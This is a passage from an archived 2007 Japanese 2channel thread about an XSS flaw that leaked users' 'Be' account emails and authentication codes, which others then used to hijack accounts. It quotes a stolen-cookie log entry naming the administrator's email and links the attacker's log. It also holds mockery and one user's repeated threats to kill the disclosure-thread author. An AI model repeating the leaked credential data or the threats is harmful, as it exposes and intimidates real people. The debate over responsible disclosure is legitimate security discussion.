      :    ' ・丿   ̄≠Ξイ´,-、 ヽ /イ´ r. `ー-'メ ,.-´、  i     u  ヾ``ー' イ
       \_    _,,......::   ´゙i、 `¨ / i ヽ.__,,... '  u ゙l´.i・j.冫,イ゙l  / ``-、..- ノ :u l
   u      ̄ ̄  彡"   、ヾ ̄``ミ::.l  u   j  i、`ー' .i / /、._    `'y   /
              u      `ヽ  ゙:l   ,.::- 、,, ,. ノ ゙ u ! /_   ̄ ー/ u /
           _,,..,,_    ,.ィ、  /   |  /__   ``- 、_    l l  ``ーt、_ /  /
  ゙   u  ,./´ "  ``- 、_J r'´  u 丿 .l,... `ー一''/   ノ  ト 、,,_____ ゙/ /
        ./__        ー7    /、 l   '゙ ヽ/  ,. '"  \`ー--- ",.::く、
       /;;;''"  ̄ ̄ ───/  ゙  ,::'  \ヾニ==='"/ `- 、   ゙ー┬ '´ / \..,,__
、      .i:⌒`─-、_,....    l   /     `ー┬一'      ヽ    :l  /  , ' `ソヽ
ヾヽ     l      `  `ヽ、 l  ./  ヽ      l         )  ,; /   ,'    '^
0289動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 01:20:57ID:IPcjqu6y0
まじでどうしてくれるんですかね?
何か説明があってもいいんじゃねいですかね?
0290動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 01:21:09ID:mANgvz900
【ボジョレー】31xxに思いを馳せながら雑談するスレッドPart68 [旧雪だるま]【ヌーヴォー】
http://ex20.2ch.net/test/read.cgi/nanmin/1195123109/536

536 名前:ピロリ[sage] 投稿日:2007/11/28(水) 01:18:02 ?S★(520974)
どすればいいの?

0291動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 01:21:21ID:6vrIwxtJ0
Be焼きはサーバのdeny集みたいな奴に書き込んでいるだけだったと思うから、
特定日時以前に追加された奴なら戻せるんじゃね?
0292動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 01:21:23ID:RABrJ+8n0
432 名前: 通訳(関西地方)[] 投稿日:2007/11/28(水) 01:20:21 ID:eyU39FYW0
2007/11/28 (Wed) 00:58:26 READJS="off"; SUBBACK_STYLE="1"; DMDM=hiroyuki@2ch.net

なにこれ
0293動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 01:21:44ID:/wzR4GYF0
be持ちざまぁwwwwwwww
0295動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 01:21:58ID:mhLj3yaG0?PLT(12000)
これを機にBe廃止ですか
0297動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 01:22:41ID:6vrIwxtJ0
日本語間違えた
特定日時以後だ…
0300動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 01:23:55ID:DyV3F6vkP
>>292
>hiroyuki@2ch.net

^^;
0301動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 01:24:08ID:C9LVKa5R0?PLT(12022)
ひろゆき踏んでるw
446 一反木綿(福岡県) [] 2007/11/28(水) 01:21:03 ID:uTVlZfaH0 
ログのアドレスの
2007/11/28 (Wed) 00:58:26を見てみろ
ひろゆきだ

ttp://moyashi.sosite.jp/xss/log.txt
0304動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 01:25:36ID:mhLj3yaG0?PLT(12000)
BE_TYPE2の板は書き込めなかったけどBe板は書き込めた
0307動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 01:26:31ID:K2XpjZ/r0
俺が最初にbeメでひろゆきに教えてやったんだぜ
0309動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 01:26:50ID:S97IQ+ez0
>>291
認証コード変えないとまた焼かれる罠
0310動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 01:27:13ID:gcLGOiVo0?PLT(47967)
>>308
いける
0311動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 01:28:11ID:MyigGKUx0
しかしよくよく考えてみると、救済といってもメアドとパス晒されてるから
そこを登録しなおさない限り、何度でも入れるわけで
そうなると新しいパスを出さないとだめだから
いちいちそんなめんどうなことするはずもなく
もう無理だろうな。あきらめるか。
0320動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 01:32:57ID:0ME7KM++0
ワロス
0321フェンリル ◆be/xFEN/R.
垢版 |
2007/11/28(水) 01:33:41ID:3Qr1hIFh0?DIA(299004)
クソったれ・・・
てえーらニュー速民死ね
一生呪ってやるからな
0325動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 01:34:51ID:ATB/kmTU0
男ならガツンと踏むもんだろ!
俺はそうして生きてきた
思えば戦争の時も地雷を踏んでよかったと思っている!
お前らも国に誇りを持て!
0327動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 01:36:28ID:vfVA6ch60
>>321
殺すってメール10通も送んなよ
0329動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 01:36:59ID:AYVn7AfC0
>>321
    人
   {´┴`}ノ <ばーか
  ノ/速 /
  ノ ̄ゝ
0330動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 01:37:17ID:16tNxlve0
>>321
  , -=ミ;彡⌒`丶、. / ̄ ̄\    /^0^\   /  \―。     .|:;:;:;:;:;:;:;:;:;:;:;:;:;:i;:;:;:;:;:;:;:;:;:;:;:;:;| ( ゚д゚ )
/:::::::::::::::::::::::::::::::::::::`丶 _ノ  \  /妊_娠\  (    /  \_   |;:;:_:;:_:;:_:;:_;:;_:;:l:;_;:_:;:_:;:_:;:_;:_;|(__つ/ ̄ ̄/
/:::::::::::::::::::::::::::::::::::::::::::::::ヽ ●)(●) |/-O-O-ヽ|  /       /  ヽ |______|_____|\/__/
l::::::rィノツノtゝミン、ノノン、:::::::l (__人__)6| . : )'e'( : . |9          _) | 三|  _     _   |三 ! ∧ ∧
',::::j ==ュ  r=ハ_ハl::::::ノ   ⌒´ノ `‐-以上  ニュー速でした! .   | 三|  三シ   ヾ三  |三 |(*‘ω‘ *)
fヾ}, ィ赱、 i i ('(゚∀゚∩::jヾヽヽ  }(`;ω;´)/-=o=-     \/_    | 三′  .._     _,,..  i三 | (   )
lと',  `"" ,l l .ヽ  〈イ(,, ・∀・)}     またどこかで会おうね:::::::.ヽ ト、ニ| <でiンヽ  ;'i"ィでiン |三.|  v v
ヽ-ヘ  ,ィ''。_。ヽ、ヽヽ_)ぅ! ミ_ノ _   |○/ 。  /:::::::::  (∧∧:::... ', .iヽ!  、 ‐' /  !、 ーシ |シイ   川
   ', / _lj_ }  ,' ン /⌒  ⌒\ ♪:人  _∧:○∧_∧' 中\∧_∧    ,' :  !.     |f ノ ((  ))
   l、 ^' ='= '^ / 人 ( ●)  (●)\ ::( ´∀` ))<`Д´ >`ハ´ )@∀@)   i ,∧_∧   lノ.   
J( 'ー`)し `""´ ノ {´ウ`}⌒(__人__)⌒::::: (( ( つ ヽ ..ヽ     ) (((  ) /つφ  (^ν^ )   イ l ∀・|ノ
 (  )\('∀`) '´ ノ/速/ > |r┬-|     |〉 と/  ))) ♪ |  || | | ('A`)ノシ  O^ソ⌒とヽ  i /__|
 ||  (_ _)ヾ  ノ ̄ゝ   `ー'\(^o^)/(__/^(_) <_<__〉_.(__)(へべi、 (_(_ノ、_ソ′ ノ/'"| |

           ニュース速報   http://news20.2ch.net/news/
0332動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 01:38:17ID:uggzv0lM0
やっべ面白いwww
0333動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 01:38:43ID:cxijH+Ob0?PLT(18412)
beに金なんか払ってた奴ざまぁ
wwwwwwwwwwwwwwくやしいのうwwwwwwwwwwwwwwくやしいのう
               wwwwwwwwwwwwwwくやしいのうwwwwwwwwwwwwwwくやしいのう

ソリティア脂肪wwwwwwwwwwwwwwくやしいのうwwwwwwwwwwwwwwくやしいのう

プギャーwwwwwwwwwwwwwwくやしいのうwwwwwwwwwwwwwwくやしいのう
0342フェンリル ◆be/xFEN/R.
垢版 |
2007/11/28(水) 01:42:24ID:3Qr1hIFh0?DIA(298954)
>>335
ああ、そうだな仲間だな
ついカっとなちまった・・・クソ

http://news23.2ch.net/test/read.cgi/news/1196173345/1
リアルにこんなスレ立てたこいつ殺す。
こいつの責任だ。死んで罪を償って貰う(通報とかはしないでね)
0343動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 01:42:39ID:uqsIIb2/0
>>321
他人の不幸がおもしろい! 

          \(^ν^)/
\(^ν^)×(^ν^)/ | |\(^ν^)/
  | |     | |  <>  | |
  < >   />      /\

                        ニュース速報
                        http://news23.2ch.net/news/
0345動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 01:43:09ID:5DcHoz/q0
               _
              /  \―。
            (    /  \_
             /       /  ヽ   / ̄ ̄ ̄ ̄ ̄
         ...―/          _)  < ちんちん シュッ! シュッ! シュッ!
        ノ:::へ_ __    /      \_____
        |/-=o=-     \/_
       /::::::ヽ―ヽ -=o=-_(::::::::.ヽ
      |○/ 。  /:::::::::  (:::::::::::::)
      |::::人__人:::::○    ヽ/
      ヽ   __ \      /
       \  | .::::/.|       /
        \lヽ::::ノ丿      /
          しw/ノ___-イ
           ∪
0347動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 01:43:28ID:1iJYmxpq0?PLT(13497)
0349動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 01:43:36ID:Uu+Fgv/O0?2BP(3833)
>>342
なっちゃん怒っちゃダメ
0350◆za9cgQvRCI
垢版 |
2007/11/28(水) 01:43:59ID:GKC80W3w0
be焼かれたぞ、このうんこが
0351動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 01:44:16ID:16tNxlve0
>>342
くやしいのうwwwwwwwくやしいのうwwwwwwwwww
0355動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 01:45:32ID:9EcMt3x/0
>>353
それが賢明だな
0356動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 01:45:32ID:AYVn7AfC0
>>334
>>342
漏れたか?
0357動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 01:46:00ID:I3HuDW2p0
>>334
0360動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 01:47:15ID:16tNxlve0
>>359
(^o^)ノ焼きつくセー
0361動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 01:47:26ID:L7pLkBpp0
>>334
フェンリル涙目wwwwwwwwwwwww
0364動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 01:48:16ID:Xi+gcJDE0
                       コングラッチュレーション
             ,―==7     Congratulation!   コングラッチュレーション
             |く ___ _>                    Congratulation!
             fll`ーU+'
             `''、 ー=|      おめでとう・・・・・・・・!
          _,,..-´:|ヽー-;ー..,,_
.  ,−=-, ,,..-‘≡≡:| ><´|≡::|ヽ    おめでとう・・・・・・・・!  おめでとう・・・・・・・・!
.  | l____ヽ.|≡l≡≡≡| |::| |≡:::/::|
.  |(llー´_ヽ|≡|≡≡≡|.|:::|l≡::/::::|      Be焼きおめでとう・・・・・・・・・・・・!
.. 4 l__`=|_|≡:|≡≡≡::||:::|'≡/≡|
/|\,.・|::≡:|ヽ|≡≡≡≡≡:::/|≡::|                         _,,.........、
≡|/}:ヽ|:≡|::::|{≡≡≡≡≡:::{ .|≡::|                        ヽ_,,   ヽ
≡:| |:::|l≡:|≡|:|≡≡≡≡≡:::|. .|≡::|                        /_>   |
:::≡l|:::|'≡:|≡:|::|≡≡≡≡≡:::|. .|≡::|                       |7 llう.. |
≡≡≡≡/|≡ヽ≡≡≡≡≡::::|. ..|≡::|.    z-..,〃、             ム__ ll´.. |
::≡≡≡::/ ヽ≡ヽ≡::|―、≡≡::l ..|≡::|   /    ミ              1´/ヽ==,...
::≡≡≡|   \≡ヽ::|  ヽ≡≡l  .ljヽl  |   刀、ミ           _,,,..-`‐三=ー-
::≡≡≡|    |ヽ/ー.、.. ヽ≡≡l.  .|/  |  ノ= ∠i         /ヽ、≡≡≡≡≡
:|¬、≡≡ヽ.  |≡ゞー=ッ  |≡≡|   __/ (ll ー゜\|ヽ.       /≡::ヽ≡≡≡≡≡
:|  ヽ≡≡ヽ |≡≡ヽミ.   |≡≡|  l|. ll7| ヽu=/l二ll二l'''ヽ  /≡:::/≡≡≡≡≡
:|   ヽ≡≡ヽ≡≡|     |≡≡|  | | llヽ|w-ヽ/Nヽll  |  | /≡:::/≡≡≡≡≡≡
0365動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 01:49:17ID:cxijH+Ob0?PLT(18412)
155 名前:ひ@どうやら管理人 ★[] 投稿日:2006/07/30(日) 08:27:03 ID:???0 ?BRZ(4603)
>>149
だから、答えなくても、理解できる人は既に理解してるでしょ。。
自分の理解力不足を認めるところから前に進んだほうがいいとおもいますよ。

西村が「掲示板から出て行け」とか言いやがった。おまえが間違ってるじゃろ。認めろや。ボケカス
http://mimizun.com/log/2ch/news/news20.2ch.net/test/read.cgi/news/1154211623/

俺が立てたN速最高の良スレ。プギャーwwwwwwwwwwwwww
人に説教してる場合じゃねぇな。俺は既に見切ってたwwwwwwwwwwwwww
0367動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 01:51:48ID:MyigGKUx0

ニュー速のプログラマー達、力を合わせてくれ(><;)
ニュー速の該当スレでひろゆきっぽいのが対策募集してるっぽいし
偽者かもしれないけど
0372動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 01:56:24ID:L4ON4fpz0
be持ちなんてみんな氏んじゃえ、バーカバーカ
0373動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 01:56:49ID:NbDXJ4Wb0?2BP(62)
どーなってんじゃ
早く元に戻しやがれ
0374動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 01:56:51ID:6nQJ3SDD0
ERROR:Beユーザー情報の取得に失敗しました。(Invalid response)
         ____
      /::::::─三三─\
    /:::::::: ( ○)三(○)\ え・・・ニュー速だけで規制されてるはずじゃ・・・
    |::::::::::::::::::::(__人__)::::  | ________
     \:::::::::   |r┬-|  / | |          |
    ノ::::::::::::  `ー'´   \ | |          |
0375動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 01:57:03ID:plBSAkJ20?PLT(21366)
test
0376動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 01:57:12ID:Cqud17Wo0?2BP(11)
てs
0387動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 02:03:34ID:U0Dg3pMJ0
あのカオスなスレを見るとN速はもういらんな
0394動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 02:08:59ID:cxijH+Ob0
>>392
VIPのスレストは「ポイントが戻ってくる」事を前提でやってたんだけど
それにVIPのスレで話し合いが続いているので見ている。
自分で理解出来たら始める。
0398動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 02:11:50ID:cxijH+Ob0
やっぱりアレですね、beシステムの欠陥(β)である事の、もろじゃくせいが明らかになりました。
対策に時間を要するなら「記者制度」復活も視野に入れて考えた方が板の為でしょうね。
0399動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 02:12:33ID:mANgvz900
おやすみ
0402動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 02:13:27ID:34Yq5dAY0
折角だからbe自体廃止にしろよ。
餓鬼や白痴しかポイント乞食しないから、全然面白くないスレばっかだぞ
0403動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 02:13:40ID:Ek2av88i0
なんで俺の立てたスレカオスのまま500kbオーバーしたの?
0405動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 02:14:50ID:dwpQEFJW0?PLT(12001)
面白くなってきた
0406動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 02:15:13ID:6nQJ3SDD0
ダーメだ、何回やり直しても
Beユーザー情報の取得に失敗しました
って表示されるわ
0408動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 02:15:59ID:DyV3F6vkP
あのスレ走馬灯のようだったな
0409動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 02:16:00ID:EBDeoFvv0?2BP(1520)
てs
0411動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 02:16:50ID:ctFp0UqH0
てす
0412動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 02:20:23ID:q5EOuxHeP
とりあえず、前に進んでみようか…
0417動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 02:25:05ID:Ct5lX3s20
これこそどういうことなの?


http://qb5.2ch.net/test/read.cgi/operate/1188056382/l50

57 名前: [―{}@{}@{}-] たまご ◆EGGMAN.XJI メェル:sage 投稿日:2007/09/03(月) 00:25:11 ID:UHhgNS9A0 BE:110959872-S★(577791)
クッキー使ってbeの認証コードとメアド盗めるよー(^o^)ノ
株の操作し放題だろうがたぶんつまらんからやめとく
0419 ◆kusai/ZzDI
垢版 |
2007/11/28(水) 02:25:52ID:noumaBjr0
前から知ってたってこと
0421動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 02:27:09ID:5DcHoz/q0
    ___
  /  R /\ 
  /   /\  \  
 |  / /=ヽ \  | 
 |/ (゚)  (゚) \|  
 \── ゝ── ノ    _______
   \____/      | |            |
   ⌒ヽ ヽノ ヽ     | |   DELL   |  
 /   ノ::::::::::::::::::l\.   | |            |
 ヽ  `ー― ⌒、ヽ    |_|______|
    ー――、_ヾ⌒ヽ〜== | |  |
Flashも、最初は良くわからないキャラクターが「Wasabi」と叫んでいるだけで面白かった。
AAが音楽に合わせて動くだけで面白かった。

でも、だんだんと見る側の目は肥えていって、マンネリだとか、
技術があるのは一握りだとか言われ始めて職人が減り、
いわゆる「のまねこ」で見る側の不信感が高まって、
職人のやる気には止めが刺されてしまい、Flashを作る人は居なくなった。
職人の原動力は「賞賛されたい」「功名を立てたい」という気持ちがやはり大きいのだと思う。

インターネット上で行われる無償の活動の多くに、「作品公開→視聴側からの賞賛(反応)」の流れは当てはまる。
ニコニコ動画へ動画をアップロードする人、教えてgooとかYahoo知恵袋で質問に答える人もそうだろう。
Webサイトやブログを運営する人にはカウンタが回ることやコメントが付く事がそうだったり、
2ちゃんねるの祭りで活躍するスネークだって、要求に対してZIPをアップロードする人だって、結局はみんな同じ。

一方で、ν速の珍種スレは従来の「賞賛されたい」がための個人プレーとは違い、大人数との一体感を味わうためにある。
シュッシュッシュとキッキッキの絶妙なバランス。
「これは既婚女性板に立てるべきスレだな」など、洗練された定型句。
チンシュには国籍・人種・信条による差別や技能差なんて存在しない。
この、誰でも参加できる奇蹟のカーニバルにこそ、個人間のつまらない競争から発生する問題を解決するカギがあるのだ。
0423動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 02:28:51ID:QoXjSsS70
というか、IDなメアドとほぼパスみたいな認証コードをそのまんま送る仕様はどうなのよ。
ログインフラグとハッシュをクッキーに保存してとかじゃダメなの。
0424動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 02:30:01ID:6nQJ3SDD0?PLT(12001)
0425動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 02:31:23ID:u5LrNLi50?2BP(124)
てす
0427◆za9cgQvRCI
垢版 |
2007/11/28(水) 02:31:59ID:GKC80W3w0?2BP(150)
てす
0429◆za9cgQvRCI
垢版 |
2007/11/28(水) 02:33:34ID:GKC80W3w0?2BP(0)
もう一回てすと
0431動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 02:34:21ID:J25Y8IhT0?2BP(4072)
てst
0435動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 02:35:14ID:QoXjSsS70?2BP(111)
止めてるだけじゃね。
0440◆za9cgQvRCI
垢版 |
2007/11/28(水) 02:36:53ID:GKC80W3w0?2BP(0)
もう寝るか・・・
0441動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 02:37:17ID:8igj5YIL0
そうなんだよね。俺が一昨日ぐらいに見つけて、たまごに言ったら
それ夏頃にkusaiと自分が見つけたと言われて、XSSが発生する場所も一致した。
んで黙ってるのはつまらないと思ったので全壊に頼んで立てて貰ったという訳。
0442動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 02:38:02ID:GHukjDJg0?PLT(26150)
                            ,.--、
                  r'" ̄ヽ       (    )
                 '、   ノ        ノ,.--'
                   ̄ヾヽ    //
            \\       ノ `ー‐'´ 'ー、
              \\   /       `::..`'ー、
ちょっと           /    ,ィ / | |ミ', ゙::. ゙:::..'、
 通りますよ〜      r' / '´゙'/ノノ`"' l トミ', ゙:.. ゙:::..',
            //  ! |  ,4'、´   -.、!Rミ|  :::.. ゙:::.', 、
            //    Y! ,イノ;;:|  (ソ;;r'リノ i :.. ::::. ゙:::', `i
                  | ソ,,"ー"  `'ー(( ノ ::. ゙::::.. ゙:::', '、,
                  | ヾ、  ヮ  "",ふ,'  :::. ゙::::.. ゙::ヽ  !、
                  |   ` '' ー‐ '''フノ   ::::: ゙::::.. ゙::ヽ、 、
                  ,.|       '、'=、    ゙::::.. ゙:::.... ゙::::\`
               r' r'                 ゙::::::.. ゙::::.. ゙:i
               ' (_                  ゙::::. ::::  :ヽ,
                  `ー'" ̄`'ー、_,...--―--、,.-一'"⌒`'ー'"´
0443 ◆kusai/ZzDI
垢版 |
2007/11/28(水) 02:38:51ID:noumaBjr0?S★(713689)
>>441
せめてrootさんとかにメールしようよ。。。

どんだけ被害出るか想像できるでしょ・・;;
0448動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 02:41:02ID:cxijH+Ob0
というわけで、ちょっとしたテスト版です。

不具合ありまくりの可能性が高いので、
変なことがあっても大きな心で受け止めることの出来る方のみご利用ください

---------
金銭の受け渡しに等しいのに、この免罪符の恐ろしさだよねw
0450動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 02:43:23ID:asw2SG6V0
というか専門学校生並みのコード書いて金取ってるアフォの首を吊らせろよwww
0451 ◆kusai/ZzDI
垢版 |
2007/11/28(水) 02:44:26ID:noumaBjr0
>>446
一応報告はしてたんだ、、けどあそこまで情報公開(Beのメルアドとか抜ける) ってのはする必要ないと思った。。。
 
2chの動作報告はここで。 パート22
http://qb5.2ch.net/test/read.cgi/operate/1182679645/529-590

なんだかんだ言って過去にXSSのこと書き込んだたら修正されたし。。。

まぁ終わっちゃったことはどうこういってもしょうがないけどさ。。
0452動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 02:45:50ID:5x2gw4TNO
焼かれたんじゃなくて作業中だからだろ
明日の昼には使えるさ
薄毛タラコのハゲが直すよ
0457動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 02:50:02ID:Ws11E1jnO
馬鹿の自己満足の為にメアド晒されて、beも焼かれた奴等が哀れだな
0460せっ☆マ ◆wwwwWwWWWw
垢版 |
2007/11/28(水) 02:53:24ID:czs3JfXA0?PLT(35752)
エスケープてPHPやらPerlやらの解説書読んだら一番はじめに出てくるとこだろww
0461動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 02:53:43ID:ig3mEAZS0
         _
    /|  |iii|〜ヽ
   (>|  |iii|-<) ヒィ
。.。 ゚し|  |iii|-J゚
        ●_● /|
        (・ω・) //
        /∴∵つ′
0462動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 02:54:33ID:uPR5qK/u0
何で焼かれたか疑問に思って来たけどそういうことか
0463 ◆kusai/ZzDI
垢版 |
2007/11/28(水) 02:54:49ID:noumaBjr0
結論: cocoaタンはかわいい


おやすみー(^0^)ノ



#manabiの中の人、悪意はなかったんだったらこれからXSSとか見つけたら
#http://qb5.2ch.net/test/read.cgi/operate/1182679645/556
#にメールしたらちゃんと管理人とか対応できる人に転送してくれるはずだから、できればそうしてほしいと思う
0471動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 02:59:52ID:8igj5YIL0
前回トラックバックの穴を見つけた時は
タラコに送ったら数日後には塞がれてたんだよな
俺は自治厨でもないし運営陣が好きな訳でもない
なのでそっちが迷惑を被ろうがどうでもいい
罰が必要だと思うなら科せばいいだけだ
0474動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 03:05:07ID:Uk72KhQ40
0か1かで1だったら焼かれてるってエラー返すようになってるんだろ
板がnewsだったら1になるようにしたんだろ
西村アホだから別の表示にしようとか考えられなかったんだろ
0477動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 03:07:47ID:SokhP4mr0
状況を理解してもらえないようで残念。
2ちゃんねるが告訴するか、被害者が告発して警察が動けば逮捕される可能性がある。
office事件でアホな判例ができたから、脆弱性の指摘は慎重にやったほうがいいよ。
ひろゆきが告訴することはないだろうけど。
0478動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 03:08:36ID:S5bI6PD70
統一教会wwwww
0479動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 03:09:38ID:1iJYmxpq0
>>477
仮にそうなったら告発対象はスレ立て依頼者か?
0480動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 03:11:23ID:QoXjSsS70
先生!!
試しにBE焼きスクリプトを見にいったらここにもXSSがあるんですけどどうしたらよいんですか。
0481動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 03:13:06ID:asw2SG6V0
>>480
好きにしなさいよw
0483動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 03:15:05ID:asw2SG6V0
>>477
さすがにしてないってことは無いだろうが
今回の実被害額っていくらぐらいだろう

あんまり大した事無い気がする
あと俺の睡眠時間返せよ><
0488動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 03:27:15ID:QoXjSsS70
とりあえず、おちんちんランドをアラートすることに成功したんだけど、
現状、あーしてこーしたらまんま同じに使えてしまうから、URL貼らないことにしておく。
っていうか、>>480でいちゃった時点で、バレバレなんだけど。

とりあえずbbeってとこにもXSSあったよと報告。方法はまあ想像通りなので書かない。
0493 ◆SCHearTCPU
垢版 |
2007/11/28(水) 03:33:41ID:WqtpZDM90
何?2chってのは有料だったのか。
使用料のスレが立つ度にネタだと思ってたのに。
0494動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 03:37:33ID:/tmllXdF0?PLT(63300)
     )、._人_人__,.イ.、._人_人_人
   <´ スレ立て用のサブ垢返して !   >
    ⌒ v'⌒ヽr -、_  ,r v'⌒ヽr ' ⌒
// // ///:: <   _,ノ`' 、ヽ、_ ノ  ;;;ヽ  //
///// /::::   (y○')`ヽ) ( ´(y○')    ;;|  /
// //,|:::     ( ( /    ヽ) )+     ;| /
/ // |:::     +  ) )|~ ̄ ̄~.|( (       ;;;|// ////
/// :|::       ( (||||! i: |||! !| |) )      ;;;|// ///
////|::::    +   U | |||| !! !!||| :U   ;;; ;;;| ///
////|:::::       | |!!||l ll|| !! !!| |    ;;;;;;| ////
// / ヽ:::::       | ! || | ||!!|    ;;;;;;/// //
// // ゝ:::::::: :   | `ー----−' |__////
0497オッサン ◆1.Fuck.nn.
垢版 |
2007/11/28(水) 03:50:23ID:mw+zADomP
>>496
VIP
でスレスト祭り中
被害は甚大だな
かなりさっきのリストから使われてる
0499オッサン ◆1.Fuck.nn.
垢版 |
2007/11/28(水) 03:51:58ID:mw+zADomP
焼かれて書けないのはν速だけだしNE☆
0502動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 04:23:18ID:iZp+A79X0
やべー全然スレ立ってない
ν速オワタ
0505動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 04:33:41ID:7ePYGac00
阿鼻叫喚
まとめとしてはこれでいいのかな
−−−−−−−−−−−−−−−−−−−−−

【速報】 俺、2chにBeのメアドと認証コードが漏れるXSS脆弱性を発見
http://news23.2ch.net/test/read.cgi/news/1196173345/
【速報】 俺、2chにBeのメアドと認証コードが漏れるXSS脆弱性を発見 その2★
http://news23.2ch.net/test/read.cgi/news/1196179103/
【速報】 俺、2chにBeのメアドと認証コードが漏れるXSS脆弱性を発見 その3★
http://news23.2ch.net/test/read.cgi/news/1196182094/


【news】ニュース速報運用情報42【ν】
http://qb5.2ch.net/test/read.cgi/operate/1196072109/135

135 名前:ひろゆき@どうやら管理人 ★[] 投稿日:2007/11/28(水) 01:02:52 ID:???0 ?S★(1012558)
修正。


なんだかわからないが
・ニュー速ではBEログインで書きこめない 「ERROR:焼かれた be は使えません!」
・Be12000以上で100%スレ立て成功だったが無くなった
・TATESUGI=512なのでほぼ●持ちの天下
0509動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 04:38:33ID:I3HuDW2p0
きたー
0511ひろゆき@どうやら管理人 ★
垢版 |
2007/11/28(水) 04:39:30ID:???0?S★(1012558)
passが変わると認証コードも変わりますよ。。と。
0512動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 04:39:50ID:7ztezYXi0
認証コードとメアドあれば使えちゃうんじゃないの?
0515動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 04:40:24ID:I3HuDW2p0
旧パスだけ入れて修正押しても修正しましたって出たけど
大丈夫なのこれ
0517ひろゆき@どうやら管理人 ★
垢版 |
2007/11/28(水) 04:42:08ID:???0?S★(1012558)
>>515
そういうときはパスは変わってないはず。。
0519動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 04:43:17ID:7ePYGac00
俺の危険ランプが点滅してる
